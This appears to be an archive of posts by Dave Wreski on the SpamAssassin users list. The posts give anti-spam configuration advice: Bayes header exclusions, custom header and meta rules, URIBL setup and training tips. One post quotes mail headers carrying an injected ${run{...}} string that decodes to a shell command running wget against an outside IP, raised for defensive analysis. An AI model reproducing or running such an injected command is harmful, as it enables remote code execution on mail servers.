Re: Strange findings debugging bayes results

2023-02-16 Thread Dave Wreski

Hi,

Here's also another 50+ headers we've collected over the years that I 
believe started as a list from AXB 10+ years ago.


https://pastebin.com/raw/f6Fwh8HJ

dave

On 2/16/23 6:02 AM, Henrik K wrote:

On Thu, Feb 16, 2023 at 10:18:50AM +0100, hg user wrote:

I was investigating a bunch of bitcoin spam: different titles,
different senders (all from gmail), different text, different pdf
attachment.

Unfortunately in those days my bayes db was polluted and they all got
a BAYES_50, 0.8.

I tested the messages now with a recreated bayes db and got some
BAYES_999. So I dug to understand if I already saw the spam...

But the debug result was unpleasant:
dbg: bayes: tokenized header: 92 tokens
dbg: bayes: token 'HX-Received:Jan' => 0.998028449502134
dbg: bayes: token 'HX-Google-DKIM-Signature:20210112' => 0.997244532803181
dbg: bayes: token 'H*r:sk:' => 0.997244532803181
dbg: bayes: token 'H*r:a05' => 0.995425742574258
dbg: bayes: token 'HAuthentication-Results:sk:.' => 0.986543689320388
dbg: bayes: token 'HX-Google-DKIM-Signature:reply-to' => 0.916110175863517
dbg: bayes: token 'H*r:2002' => 0.877842810325844
dbg: bayes: token 'HAuthentication-Results:2048-bit' => 0.858520043212023
dbg: bayes: token 'HAuthentication-Results:pass' => 0.855193895034317
dbg: bayes: score = 0.97915091326


Every score is based on headers: very generic headers, and some
related to my setup.

Not a single token comes from the message body.

The Bayes implementation has been practically unmaintained for a long time,
so YMMV.

You can try something like this, most headers are parsed badly and generate
biasing random garbage (unscientific observation):

bayes_ignore_header ARC-Authentication-Results
bayes_ignore_header ARC-Message-Signature
bayes_ignore_header ARC-Seal
bayes_ignore_header Authentication-Results
bayes_ignore_header Autocrypt
bayes_ignore_header IronPort-SDR
bayes_ignore_header suggested_attachment_session_id
bayes_ignore_header X-Brightmail-Tracker
bayes_ignore_header X-Exchange-Antispam-Report-CFA-Test
bayes_ignore_header X-Forefront-Antispam-Report
bayes_ignore_header X-Forefront-Antispam-Report-Untrusted
bayes_ignore_header X-Gm-Message-State
bayes_ignore_header X-Google-DKIM-Signature
bayes_ignore_header x-microsoft-antispam
bayes_ignore_header X-Microsoft-Antispam-Message-Info
bayes_ignore_header X-Microsoft-Antispam-Message-Info-Original
bayes_ignore_header X-Microsoft-Antispam-Untrusted
bayes_ignore_header X-Microsoft-Exchange-Diagnostics
bayes_ignore_header x-ms-exchange-antispam-messagedata
bayes_ignore_header x-ms-exchange-antispam-messagedata-0
bayes_ignore_header x-ms-exchange-crosstenant-id
bayes_ignore_header x-ms-exchange-crosstenant-network-message-id
bayes_ignore_header x-ms-exchange-crosstenant-rms-persistedconsumerorg
bayes_ignore_header X-MS-Exchange-CrossTenant-userprincipalname
bayes_ignore_header x-ms-exchange-slblob-mailprops
bayes_ignore_header x-ms-office365-filtering-correlation-id
bayes_ignore_header X-MSFBL
bayes_ignore_header X-Provags-ID
bayes_ignore_header X-SG-EID
bayes_ignore_header X-SG-ID
bayes_ignore_header X-UI-Out-Filterresults
bayes_ignore_header X-ClientProxiedBy
bayes_ignore_header X-MS-Exchange-CrossTenant-FromEntityHeader
bayes_ignore_header X-OriginatorOrg
bayes_ignore_header X-MS-Exchange-CrossTenant-OriginalArrivalTime
bayes_ignore_header X-MS-TrafficTypeDiagnostic
bayes_ignore_header X-MS-Exchange-CrossTenant-AuthAs
bayes_ignore_header X-MS-Exchange-Transport-CrossTenantHeadersStamped
bayes_ignore_header X-MS-Exchange-CrossTenant-AuthSource
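
Before extending a list like this, it can help to tally which header names actually contribute tokens in the "-D bayes" output. A minimal Python sketch, assuming the debug lines look like the ones quoted in this thread and that header tokens are shaped like H<name>:<value> (a heuristic, not a documented format); the function name is made up for illustration.

```python
import re
from collections import Counter

# Matches lines such as:
#   dbg: bayes: token 'HX-Received:Jan' => 0.998028449502134
TOKEN_RE = re.compile(r"dbg: bayes: token '(?P<token>.+)' => (?P<prob>[0-9.]+)")

def header_token_counts(debug_output: str) -> Counter:
    """Count tokens per header name (heuristic: tokens shaped like H<name>:<value>)."""
    counts = Counter()
    for match in TOKEN_RE.finditer(debug_output):
        token = match.group("token")
        if token.startswith("H") and ":" in token:
            # Strip the leading "H" and keep everything up to the first colon.
            header = token[1:].split(":", 1)[0]
            counts[header] += 1
        else:
            counts["(body or other)"] += 1
    return counts

sample = """\
dbg: bayes: token 'HX-Received:Jan' => 0.998028449502134
dbg: bayes: token 'H*r:a05' => 0.995425742574258
dbg: bayes: token 'HAuthentication-Results:pass' => 0.855193895034317
dbg: bayes: token 'HAuthentication-Results:2048-bit' => 0.858520043212023
"""

for header, n in header_token_counts(sample).most_common():
    print(f"{n:3d}  {header}")
```

Headers that show up often here and carry no real signal are the candidates for bayes_ignore_header.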

--
Dave Wreski
President & CEO
Guardian Digital, Inc.
We Make Email Safe

640-800-9446
dwre...@guardiandigital.com
https://guardiandigital.com
103 Godwin Ave, Suite 314, Midland Park, NJ 07432


Intuit servers sending paypal phishes

2022-05-06 Thread Dave Wreski
Hi, Intuit's servers are being used to send Paypal phishing invoices 
combined with the "evil numbers" scam.


https://pastebin.com/iad07S8N

Received: from o4.e.notification.intuit.com 
(o4.e.notification.intuit.com [167.89.82.160])

X-Spam-Status: No, score=-15.691 tagged_above=-200 required=5
tests=[DKIMWL_WL_HIGH=-0.592, DKIM_SIGNED=0.1, DKIM_VALID=-0.1,
DKIM_VALID_AU=-0.1, HTML_MESSAGE=0.001, RCVD_IN_MSPIKE_H2=-0.001,
SPF_HELO_NONE=0.001, SPF_PASS=-0.001, T_REMOTE_IMAGE=0.01,
T_SCC_BODY_TEXT_LINE=-0.01, URIBL_BLOCKED=0.001,
USER_IN_DEF_DKIM_WL=-7.5, USER_IN_DEF_SPF_WL=-7.5]

Authentication-Results: orion.example.com;
dkim=pass (2048-bit key; unprotected) header.d=notification.intuit.com 
header.i=@notification.intuit.com header.a=rsa-sha256 header.s=s1 
header.b=p9xDPEcU
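
To see how much of that negative score comes from the default whitelist entries, the tests=[...] list can be summed per rule. A rough Python sketch, assuming the amavis-style RULE=score format shown in the header above; parse_tests is an illustrative helper, not part of any tool.

```python
import re

def parse_tests(status: str) -> dict:
    """Extract {rule: score} from the tests=[RULE=score, ...] part of X-Spam-Status."""
    match = re.search(r"tests=\[(.*?)\]", status, re.DOTALL)
    if not match:
        return {}
    scores = {}
    for item in match.group(1).split(","):
        name, _, value = item.strip().partition("=")
        if name and value:
            scores[name] = float(value)
    return scores

status = """No, score=-15.691 tagged_above=-200 required=5
tests=[DKIMWL_WL_HIGH=-0.592, DKIM_SIGNED=0.1, DKIM_VALID=-0.1,
DKIM_VALID_AU=-0.1, HTML_MESSAGE=0.001, RCVD_IN_MSPIKE_H2=-0.001,
SPF_HELO_NONE=0.001, SPF_PASS=-0.001, T_REMOTE_IMAGE=0.01,
T_SCC_BODY_TEXT_LINE=-0.01, URIBL_BLOCKED=0.001,
USER_IN_DEF_DKIM_WL=-7.5, USER_IN_DEF_SPF_WL=-7.5]"""

scores = parse_tests(status)
total = sum(scores.values())
whitelist = sum(v for k, v in scores.items() if k.startswith("USER_IN_DEF_"))
print(f"total={total:.3f} whitelist={whitelist:.1f} everything_else={total - whitelist:.3f}")
```

In this message the two USER_IN_DEF_* rules account for 15 of the 15.691 negative points, so content rules have little chance of catching it while those entries apply.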



Re: Why shouldn't I set the score for SPAM_99 and SPAM_999 higher?

2022-05-05 Thread Dave Wreski



That's a great call, thanks. I grepped my mail files and didn't find 
any SPAM_99 headers in any of them.


You should be looking for BAYES_99 and BAYES_999 in your corpus.



Thanks, Dave. I use my various mailboxes (sa-learn --ham --mbox 
/home/thomas.cameron/mail/INBOX/[mailbox file] and then sa-learn --spam 
--mbox /home/thomas.cameron/mail/INBOX/spam) to train SA, doesn't that 
mean that I've already checked my corpora?


No, that's how you train your corpora. If you manually look through the 
headers of mail that's already been processed by your mail system, the 
ham should be as close to BAYES_00 as possible, and spam should be at 
BAYES_99. If that's not the case, then it's been trained incorrectly.
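
That manual check can be partly automated. A small Python sketch, assuming the messages already carry an X-Spam-Status header from your own filter; the helper names are hypothetical, and the check only looks at which BAYES_* rules fired.

```python
import email
import re
from typing import List

BAYES_RE = re.compile(r"\bBAYES_\d+\b")

def bayes_hits(raw_message: str) -> List[str]:
    """Return the BAYES_* rule names listed in the X-Spam-Status header."""
    msg = email.message_from_string(raw_message)
    return BAYES_RE.findall(msg.get("X-Spam-Status", ""))

def needs_review(raw_message: str, is_ham: bool) -> bool:
    """Flag ham that hit BAYES_99/BAYES_999, and spam that hit neither."""
    high = any(hit in ("BAYES_99", "BAYES_999") for hit in bayes_hits(raw_message))
    return high if is_ham else not high

ham = "From: a@example.com\nX-Spam-Status: No, score=-1.0 tests=BAYES_00,SPF_PASS\n\nhello\n"
print(bayes_hits(ham), needs_review(ham, is_ham=True))
```

To run it over a whole folder, Python's mailbox.mbox can iterate the messages in an mbox file; anything flagged is worth looking at by hand before retraining.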


/etc/mail/spamassassin/local.cf:
bayes_auto_learn  0
bayes_auto_expire 0

I'd also recommend disabling auto-learn, if you have that enabled.

If you've gone through your corpus manually, and are certain the ham is 
all good mail and the spam emails are all bad mail, then it might be 
worth it to dump the existing bayes database and just retrain it with 
the corresponding mboxes.


I also typically add --progress to sa-learn.

Best,
Dave





Thomas


Re: Why shouldn't I set the score for SPAM_99 and SPAM_999 higher?

2022-05-05 Thread Dave Wreski




You should probably check that none of your ham (i.e. non-spam)
messages contains SPAM_99 or SPAM_999. It can happen when spammers
poison your bayes database, and increased score in that case might
lead to legitimate mail being misclassified as a spam.


That's a great call, thanks. I grepped my mail files and didn't find any 
SPAM_99 headers in any of them.


You should be looking for BAYES_99 and BAYES_999 in your corpus.

Best,
Dave




Re: Seeing "check: exceeded time limit in ..." and need to resolve it

2021-11-16 Thread Dave Wreski




For that matter how many know about 'apropos'? And, even if they do,
they may not discover 'locate' because 'apropos search' doesn't find
either 'updatedb' or 'locate'. You have to enter 'apropos find' to
discover that 'locate' exists, and even then you could get side tracked
into trying to use the much more complex 'find' utility.


Or the old-school rpm:

$ rpm -ql spamassassin|grep TxRep
/usr/share/man/man3/Mail::SpamAssassin::Plugin::TxRep.3pm.gz
/usr/share/perl5/vendor_perl/Mail/SpamAssassin/Plugin/TxRep.pm

Dave



Martin



Re: More fake order spam

2021-04-27 Thread Dave Wreski




Invalid List-ID. You can then use that with other weirdness in a meta.
header    __LIST_ID_DOMAIN_IN_BRACKETS List-id =~ /<([\w-]+)(\.[\w-]+)+>/
meta   LIST_ID_IMPROPER_FORMAT __HAS_LIST_ID && !__LIST_ID_DOMAIN_IN_BRACKETS

score  LIST_ID_IMPROPER_FORMAT 0.001
describe LIST_ID_IMPROPER_FORMAT List-id has improper format


You lost me here. The spam has this:

List-Id: MzY3NDAxMi01Nzg2LTU= 

That's not legit? It's in brackets.


It's matching on the text before the brackets.


I meant to say that it's not matching __LIST_ID_DOMAIN_IN_BRACKETS
because of the text before the brackets, so LIST_ID_IMPROPER_FORMAT triggers.
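
For anyone who wants to try the pattern against sample values outside SpamAssassin, here is a quick Python sketch. It reuses the regexp from the rule as-is (Python's re is close to Perl here, though \w is Unicode-aware); both sample List-Id values are made up for illustration, and the function only mimics the meta rule's logic.

```python
import re

# Same pattern as __LIST_ID_DOMAIN_IN_BRACKETS
LIST_ID_DOMAIN_IN_BRACKETS = re.compile(r"<([\w-]+)(\.[\w-]+)+>")

def list_id_improper(headers: dict) -> bool:
    """Mimic: LIST_ID_IMPROPER_FORMAT = __HAS_LIST_ID && !__LIST_ID_DOMAIN_IN_BRACKETS"""
    value = headers.get("List-Id")
    if value is None:          # no List-Id header, so __HAS_LIST_ID is false
        return False
    return LIST_ID_DOMAIN_IN_BRACKETS.search(value) is None

samples = [
    {"List-Id": "Example users <users.lists.example.org>"},  # dotted name in brackets
    {"List-Id": "<MzY3NDAxMi01Nzg2LTU=>"},                   # hypothetical non-domain value
    {"Subject": "no list header at all"},
]
for headers in samples:
    print(headers, "->", list_id_improper(headers))
```

Note that the pattern is unanchored, so in this sketch it is the content between the brackets, not any text in front of them, that decides the outcome.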


Regards,
Dave


Re: More fake order spam

2021-04-27 Thread Dave Wreski

Hi,


Investigate adding the SEM_FRESH rules - this domain was created less
than five days ago.
https://spameatingmonkey.com/services


OK, how do I get those rules installed? I've only installed KAM rules 
using a channel. I don't see anything similar for SEM rules. I see the 
page you linked to says to drop this into the config:


# SEM-FRESH
urirhssub SEM_FRESH fresh.spameatingmonkey.net. A 2
body SEM_FRESH eval:check_uridnsbl('SEM_FRESH')
describe SEM_FRESH Contains a domain registered less than 5 days ago
tflags SEM_FRESH net
score SEM_FRESH 0.5


Just copy them to a file ending in ".cf" in your local spamassassin 
rules directory like you did with the rule you created below.


I've never seen anything like this before. Looks like this is the 
documentation for that: 
https://spamassassin.apache.org/full/3.2.x/doc/Mail_SpamAssassin_Plugin_URIDNSBL.html 


That's instructions for enabling the URIDNSBL, which is probably already 
enabled.


Check for something like this in your init.pre file
loadplugin Mail::SpamAssassin::Plugin::URIDNSBL


Invalid List-ID. You can then use that with other weirdness in a meta.
header    __LIST_ID_DOMAIN_IN_BRACKETS List-id =~ /<([\w-]+)(\.[\w-]+)+>/
meta   LIST_ID_IMPROPER_FORMAT __HAS_LIST_ID && !__LIST_ID_DOMAIN_IN_BRACKETS

score  LIST_ID_IMPROPER_FORMAT 0.001
describe LIST_ID_IMPROPER_FORMAT List-id has improper format


You lost me here. The spam has this:

List-Id: MzY3NDAxMi01Nzg2LTU= 

That's not legit? It's in brackets.


It's matching on the text before the brackets.


I believe the new Esp module that works to identify bad sendgrid
accounts also has support for sendinblue accounts, but to what extent?
X-Mailer: Sendinblue


To start, I wrote this rule that I think will probably work well because 
it doesn't make sense for any order information to come from a 
mailing list.


# fake order spam
header    __LOCAL_FAKE_ORDER_SUBJ   Subject =~ /your.order/i
header    __LOCAL_FAKE_ORDER_1      X-Mailer =~ /Sendinblue/i
header    __LOCAL_FAKE_ORDER_2      List-Id =~ /./

# subject matches, plus at least one of the Sendinblue / List-Id indicators
meta      LOCAL_FAKE_ORDER  __LOCAL_FAKE_ORDER_SUBJ && (__LOCAL_FAKE_ORDER_1 + __LOCAL_FAKE_ORDER_2 >= 1)

score     LOCAL_FAKE_ORDER  3.0


That's great, but probably doesn't have much longevity.

You can also use the following for the presence of a header:
header  __LOCAL_FAKE_ORDER_2  exists:List-Id

Regards,
Dave


Re: More fake order spam

2021-04-27 Thread Dave Wreski




-2.5 RCVD_IN_HOSTKARMA_W    RBL: Sender listed in HOSTKARMA-WHITE
                            [185.41.28.7 listed in hostkarma.junkemailfilter.com]


We've reduced this score to -1 locally.


-1.0 BAYES_00   BODY: Bayes spam probability is 0 to 1%


Needs to be trained, obviously. Bayes is best for this body content.

Looks like it's coming from some kind of bulk mail service which is 
whitelisted. Even after training with bayes, it will still be a false 
negative.


Any ideas on the best way to tackle these kinds of fake order spam?


Investigate adding the SEM_FRESH rules - this domain was created less 
than five days ago.

https://spameatingmonkey.com/services

Invalid List-ID. You can then use that with other weirdness in a meta.
header    __LIST_ID_DOMAIN_IN_BRACKETS List-id =~ /<([\w-]+)(\.[\w-]+)+>/
meta   LIST_ID_IMPROPER_FORMAT __HAS_LIST_ID && !__LIST_ID_DOMAIN_IN_BRACKETS

score  LIST_ID_IMPROPER_FORMAT 0.001
describe LIST_ID_IMPROPER_FORMAT List-id has improper format

Investigate configuring dcc. We also created a meta that matches DCC and 
URIBLs.


I believe the new Esp module that works to identify bad sendgrid 
accounts also has support for sendinblue accounts, but to what extent?

X-Mailer: Sendinblue

I believe later versions of SA also have more geolocation support - do 
you have a need to receive mail from France?

$ whois 185.41.28.7
...
route:  185.41.28.0/22
descr:  SENDINBLUE-185-41-28-0-22
origin: AS200484

Regards,
Dave






Re: Spoofed amazon order email

2021-04-16 Thread Dave Wreski

Hi Steve,

As Antony just reported, post these spamples to something like 
pastebin.com then provide a link so we can view the raw email.


X-Spam-Checker-Version: SpamAssassin 3.4.2 (2018-09-13) on 


This is the first issue I see - you're likely missing a lot of 
additional features of later versions, as well as regular updates.



From: "or...@amazon.com" 


I believe this mismatch would also be caught with later versions.


-0.0 BAYES_20   BODY: Bayes spam probability is 5 to 20%


This is the other big issue - you need to train these to recognize this 
as spam/phishing. You can also go through your quarantine to find spam 
that hasn't been properly trained to use as a corpus.


And how the hell is google letting this crap flow out of its email 
service, anyway?


Because they're in the email business, not the email security business.

Go here and make sure you're using the KAM channel (as well as the 
regular sa-updates channel).

https://mcgrail.com/template/kam.cf_channel

Best,
Dave


Re: ANN: ReturnPath rule renaming

2021-03-26 Thread Dave Wreski

Hi,


   RCVD_IN_RP_CERTIFIED -> RCVD_IN_VALIDITY_CERTIFIED
   RCVD_IN_RP_SAFE -> RCVD_IN_VALIDITY_SAFE
   RCVD_IN_RP_RNBL -> RCVD_IN_VALIDITY_RPBL

Please audit your local config for score overrides and meta rules 
depending on the old names.


I don't see that the VALIDITY rules exist yet. Will they be in tonight's 
update?


How do you recommend we manage the transition period, so that our meta 
rules that depend on the old names keep working once the new rules are 
published?


We could duplicate our rules with the old and new, but just wanted to 
see if there was a plan already for dealing with this.
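
For the audit itself, a short script can list every place a local config still uses one of the old names. A minimal Python sketch, assuming the three renames listed in the announcement; the sample config and the LOCAL_TRUSTED_BULK rule are invented for the example, and the comment stripping is naive (a "#" inside a regexp would confuse it).

```python
import re

RENAMES = {
    "RCVD_IN_RP_CERTIFIED": "RCVD_IN_VALIDITY_CERTIFIED",
    "RCVD_IN_RP_SAFE": "RCVD_IN_VALIDITY_SAFE",
    "RCVD_IN_RP_RNBL": "RCVD_IN_VALIDITY_RPBL",
}
OLD_NAME_RE = re.compile(r"\b(" + "|".join(map(re.escape, RENAMES)) + r")\b")

def find_old_names(cf_text: str):
    """Yield (line_number, old_name, new_name) for each reference in a .cf file's text."""
    for lineno, line in enumerate(cf_text.splitlines(), start=1):
        code = line.split("#", 1)[0]  # naive: drop everything after the first '#'
        for old in OLD_NAME_RE.findall(code):
            yield lineno, old, RENAMES[old]

sample_cf = """\
score RCVD_IN_RP_SAFE -1.0
meta LOCAL_TRUSTED_BULK (RCVD_IN_RP_CERTIFIED || RCVD_IN_RP_SAFE) && __HAS_LIST_ID
# RCVD_IN_RP_RNBL is not used here
"""

for lineno, old, new in find_old_names(sample_cf):
    print(f"line {lineno}: {old} -> {new}")
```

Reading each *.cf file under the local rules directory and passing its text to find_old_names would cover a whole installation.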


dave


Re: apache.org is blacklisted

2021-01-27 Thread Dave Wreski




On 1/27/21 7:40 AM, Matus UHLAR - fantomas wrote:

On Wed, 27 Jan 2021, Benny Pedersen wrote:

http://multirbl.valli.org/lookup/2a01%3A4f9%3Ac010%3A567c%3A%3A1.html

i dont know how to handle this :=)


On 26.01.21 17:43, John Hardin wrote:

Only one lists it:

  https://matrix.spfbl.net/en/3.227.148.255

  https://matrix.spfbl.net/en/2a01:4f9:c010:567c:0:0:0:1

SPFBL?


while we're here, was anyone able to get their page in english language?

https://spfbl.net/en/project/


It looks like Google Translate works pretty well for this.

http://itools.com/tool/google-translate-web-page-translator
https://translate.google.com/translate?hl=en&sl=auto&tl=en&u=https%3A%2F%2Fspfbl.net%2Fen%2Fproject%2F

Regards,
Dave


Re: Emotet today..

2021-01-13 Thread Dave Wreski
Pedro, do you see sigs for it yet? We're seeing a ton of 
Doc.Dropper.EmotetRed1220-9816007-0.


Have you submitted a sample to Steve at Sanesecurity and clamav?

Best,
Dave

On 1/13/21 10:39 AM, Pedro David Marco wrote:

Hi all...

sorry for the semi off-topic...

Today Emotet is being sent in an encrypted zip with the password 
embedded into an anti-ocr image..


watch out!

-
Pedrete


Re: Scoring Based on IP Address

2020-12-17 Thread Dave Wreski

Hi,

On 12/17/20 6:05 PM, Matt wrote:

Is there a way with spamassassin local.conf to add a higher score
based on source ip address or subnet?  Basically the last IP in
"Received:" header.

bad_subnet_add_20_points: 192.168.240.0/24

Raising the score if that IP appeared anywhere in headers or body
might work too.


Yes, but if you're effectively going to create a "poison pill" rule 
where any mail from a particular network is quarantined, you might be 
better off doing this at the firewall or in postfix directly and just 
rejecting it outright.


header __BAD_IP_RCVD  Received  =~ /192\.168\.240\.\d{1,3}/
body   __BAD_IP_BODY /192\.168\.240\.\d{1,3}/
rawbody __BAD_IP_RAWBODY /192\.168\.240\.\d{1,3}/
meta MY_BAD_SENDER __BAD_IP_RCVD || __BAD_IP_BODY || __BAD_IP_RAWBODY
score MY_BAD_SENDER 20
describe MY_BAD_SENDER Contains bad IP
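
The regexp works for a /24 because the network ends on an octet boundary. To check what a proper subnet test would report for a given header or body, here is a small Python sketch using the standard ipaddress module; the sample Received line is made up and bad_ips is an illustrative helper, not anything SpamAssassin provides.

```python
import ipaddress
import re

BAD_NET = ipaddress.ip_network("192.168.240.0/24")
# Dotted quads that are not glued to further digits or dots on either side.
IPV4_RE = re.compile(r"(?<![\d.])(\d{1,3}(?:\.\d{1,3}){3})(?![\d.])")

def bad_ips(text: str):
    """Return the IPv4 addresses found in text that fall inside BAD_NET."""
    found = []
    for candidate in IPV4_RE.findall(text):
        try:
            addr = ipaddress.ip_address(candidate)
        except ValueError:      # not a valid address, e.g. an octet above 255
            continue
        if addr in BAD_NET:
            found.append(candidate)
    return found

received = "from mail.example.net (mail.example.net [192.168.240.17]) by mx.example.com"
print(bad_ips(received))
```

For networks that do not fall on an octet boundary (a /22, say), a pure regexp gets awkward quickly, which is one more reason to do this kind of blocking in the MTA or firewall.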

Regards,
Dave



Re: adding AV scanning to working Postfix/SA system

2020-11-30 Thread Dave Wreski




On 11/30/20 7:00 PM, Joe Acquisto-j4 wrote:


On 11/24/20 12:40 PM, Axb wrote:

Fuglu supports Sophos AV
See fuglu.org


Sophos recently discontinued their support for SAVI on Linux. They now
only support "Server Central Intercept X Advanced" which is an entirely
different product.

I would also be interested in newer/supported AV alternatives.

Regards,
Dave



Where did you hear this?  I was just informed it will continue until 2023 at 
least.

The "Free" version is no longer available, apparently, but the "endpoint" 
product is still there
for paying customers.


Directly from my contact there - it was labeled end-of-sale this past 
July. It has an end-of-life date of July 2023. Support will continue to 
support that solution until then, but they will no longer offer new 
subscriptions to customers.


Regards,
Dave



joe a.

-
j4computers, llc
Stone Ridge, NY 12484
 845-687-3734
www.j4computers.com
-



Re: adding AV scanning to working Postfix/SA system

2020-11-24 Thread Dave Wreski




On 11/24/20 12:40 PM, Axb wrote:

Fuglu supports Sophos AV
See fuglu.org


Sophos recently discontinued their support for SAVI on Linux. They now 
only support "Server Central Intercept X Advanced" which is an entirely 
different product.


I would also be interested in newer/supported AV alternatives.

Regards,
Dave



On 11/23/20 5:37 PM, Joe Acquisto-j4 wrote:
So, beyond "experiences" any leads on generic "how to" guides that actually
work in practice?   I've found a few, rather than chase geese, I'm sure some
here have done similar things, even if with other AV scanners.

SOHO system, on virtual machines.   Fairly recent versions. Running openSUSE
Leap 15.1.

Due to some recent malware (obvious stuff) wanted to add AV scanning.   I
gather "Amavis-new" is the hot ticket these days,

I deal with Sophos products and would like to use their linux product to do
the scanning.   Seems to be precious little on how to do that.

Any experiences?





-
    j4computers, llc
    Stone Ridge, NY 12484
 845-687-3734
    www.j4computers.com
-



Re: to: header is not in my domain

2020-10-20 Thread Dave Wreski

Thanks for quick reply, but blacklist what?
The problem is I do not know this spammy domains.
I want to give a score when To: field is NOT in anyaddr...@mydomain.com 


If only it were that easy.

You'll notice that recipients of this mailing list receive mail to the 
mailing list address, not to each recipient.


You might have better luck building a meta rule that combines the "To:" 
field with something else, like a body rule or lack of presence of an 
SPF record, etc.


You might also consider building rules based on email !__MYDOMAIN, and 
excluding cases like this mailing list, then otherwise adding points 
that would normally be overcome by a proper SPF record or Envelope From 
address, for example.


You should submit a few of these emails to pastebin.com where we can 
analyze them more thoroughly for other patterns.


Regards,
Dave




cheers
Miki


On Tue, 20 Oct 2020 at 20:25, Benny Pedersen <m...@junc.eu> wrote:


Miki wrote on 2020-10-20 21:19:
 > Let's say my domain is mydomain.com. 99% of all the e-mails have:
 > To: m...@mydomain.com 
 > But some e-mails, most likely sent using BCC are coming with:
 > To: anyu...@anydomain.com 
 >
 > Nearly all of them are spam.

blacklist_to then

set blacklist_from to same

this is forged protecting safe

and yes, it's not foolproof since bcc can be used on remote



Re: IMPORTANT NOTICE FOR PEOPLE RUNNING TRUNK re: [Bug 7826] Improve language around whitelist/blacklist and master/slave

2020-07-10 Thread Dave Wreski




On 7/10/20 8:07 AM, Pedro David Marco wrote:
 >On Friday, July 10, 2020, 10:10:20 AM GMT+2, Axb  
wrote:



 >so glad to read this... confirms my picture of you.

 >now back my pet project: rewrite Tom Sawyer

OK... who starts??? :-)

once Finished we can rewrite "El Quixote" as well...


Perhaps if we were still calling black people Injun Joe, people were 
advocating for burning all previous copies, and scouring the Internet 
for all previous occurrences of SpamAssassin and deleting them, you 
might have a point.


Even Mark Twain by 1876 was becoming increasingly embarrassed by his 
failure to question the racist status quo of the world in which he had 
grown up.


Regards,
Dave







--
Pedro


Coronavirus domains

2020-03-17 Thread Dave Wreski

Hi all,

Malwarepatrol has just released a list of 13,000+ domains related to 
coronavirus scams:


https://www.malwarepatrol.net/wp-content/uploads/2020/03/covid-19-domains.txt
https://www.malwarepatrol.net/wp-content/uploads/2020/03/covid-19-domains.zip

Anyone else have any rules or changes relating to protecting users from 
coronavirus they'd like to share?


dave


SpamAssassin 18th anniversary article

2019-10-24 Thread Dave Wreski

Hi all,

LinuxSecurity just posted an article on the history of SpamAssassin and 
its recent 18th anniversary, some of the new features coming in v4, and 
speaks with some of the lead developers.


https://linuxsecurity.com/features/features/an-open-source-success-story-apache-spamassassin-celebrates-18-years-of-effectively-combating-spam-email

We'd love to know what you think.

Thanks,
Dave


Shell commands in Received and Delivered-To headers

2019-07-11 Thread Dave Wreski

Hi all,

Anyone have a guess on what this is trying to accomplish?

From r...@sab.com  Thu Jul 11 11:05:10 2019
Return-Path: 
X-Original-To: 
root+${run{x2Fbinx2Fsht-ctx22wgetx20199.204.214.40x2fsbzx2f93.184.216.34x22}}@host.example.com

Delivered-To: usern...@example.com
Received: by host.example.com (Postfix)
id B58F61206F7; Thu, 11 Jul 2019 11:05:10 -0400 (EDT)
Delivered-To: 
root+${run{x2fbinx2fsht-ctx22wgetx20199.204.214.40x2fsbzx2f93.184.216.34x22}}@host.example.com

Received: from sab.com (ns3.nodename.ru [89.104.77.8])
by host.example.com (Postfix) with SMTP id 78E6F120294
	for 
; 
Thu, 11 Jul 2019 11:05:10 -0400 (EDT)


The IPs and host.example.com have been changed, but it's otherwise as 
received. Is it a failed attempt at trying to generate a random string, 
or to exploit some parser?
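
The x2F/x20/x22 runs read like hex escapes whose backslashes were lost somewhere along the way, and the ${run{...}} wrapper resembles the recipient-address payloads reported against Exim in 2019 (CVE-2019-10149); both points are educated guesses rather than something confirmed in this thread. Under that assumption, a few lines of Python make the string readable:

```python
import re

def decode_hex_escapes(text: str) -> str:
    """Turn x2F or \\x2F style sequences into the characters they encode."""
    return re.sub(r"\\?x([0-9A-Fa-f]{2})", lambda m: chr(int(m.group(1), 16)), text)

# Inner part of the local part quoted above (addresses were already changed by the poster).
payload = "x2Fbinx2Fsht-ctx22wgetx20199.204.214.40x2fsbzx2f93.184.216.34x22"
print(decode_hex_escapes(payload))
```

The decoded text looks like a /bin/sh invocation that runs wget against a remote host, which points at an attempt to get the receiving MTA to execute a command rather than a random string. The "t" characters around "-c" may have been tab escapes, which cannot be recovered from this copy.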




Re: mysql 8 database problem

2018-12-08 Thread Dave Wreski


On 12/8/18 1:58 PM, Csaba Banhalmi wrote:

Hi,

I upgraded to mysql 8 and since then I can't use the bayes db to score my 
mails. spamassassin -D says the following:


[12254] dbg: bayes: tok_get_all: SQL error: Illegal mix of collations
for operation ' IN '
[12254] dbg: bayes: cannot use bayes on this message; none of the
tokens were found in the database
[12254] dbg: bayes: not scoring message, returning undef

Collation is the same as before, moreover I dumped the db and imported 
in a mysql 5.6 which works fine, I get my bayes scoring just fine.

I use spamassassin 3.4.2 and mysql 8.0.12

Any help is appreciated, thank you!


Have you run mysql_upgrade after upgrading?

I'd also consider changing to mariadb if it's supported by your 
distribution.


Regards,
Dave





Best regards,
Csaba


Re: stackexchange.com in URIBL (false positive?)

2018-07-28 Thread Dave Wreski




   5.7 URIBL_BLACK    Contains an URL listed in the URIBL blacklist
  [URIs: stackexchange.com]

I guess that's not supposed to be like that. I can't change anything at 
it, just for information for somebody in the position to fix that.


It is indeed listed, and listed for a reason.

The default score for URIBL_BLACK is 1.7 with bayes. Why have you 
changed it?


You can request that it be delisted here:

https://admin.uribl.com/

Regards,
Dave


Re: Just to lighten your day?

2018-05-03 Thread Dave Wreski

Hi,

On 05/02/2018 02:21 PM, Joe Acquisto-j4 wrote:

One slipped through, with this subtle sig line (thought it might brighten 
someone's day . . . )

"Note: Failure to Verify will lead to final termination of your email account.

Technical Team
Email Administrator
All Right Reversed 2018.(c)"


Being the open source advocates that we are here, I actually thought it 
was a reference to the "copyleft" license.


https://en.wikipedia.org/wiki/All_rights_reversed

Not to be confused with the Chemical Brothers song by the same name, lol.

Best,
Dave


Re: sneaky spams w/zipped URL file, easily caught by "Thread-Index"

2018-03-27 Thread Dave Wreski

Hi,

Excellent... except for one potential problem... this is in their 
"foxhole_all.cdb" file which they label as "high false positive risk" 
- which could scare some away!


For those who don't score very high on ClamAv and/or who are able to 
score DIFFERENTLY based on different types of Sanesecurity and/or 
ClamAv results, this is probably OK. But for others who prefer to 
either outright block or score high on ClamAv, that MIGHT present a 
problem. On the other hand, maybe Sanesecurity is just being overly 
cautious (or considering more theoretical FNs?), and such actual FPs 
in real world mail flow are actually extremely rare?


Any Thoughts? Anyone know?



That's interesting because I probably wouldn't have started using 
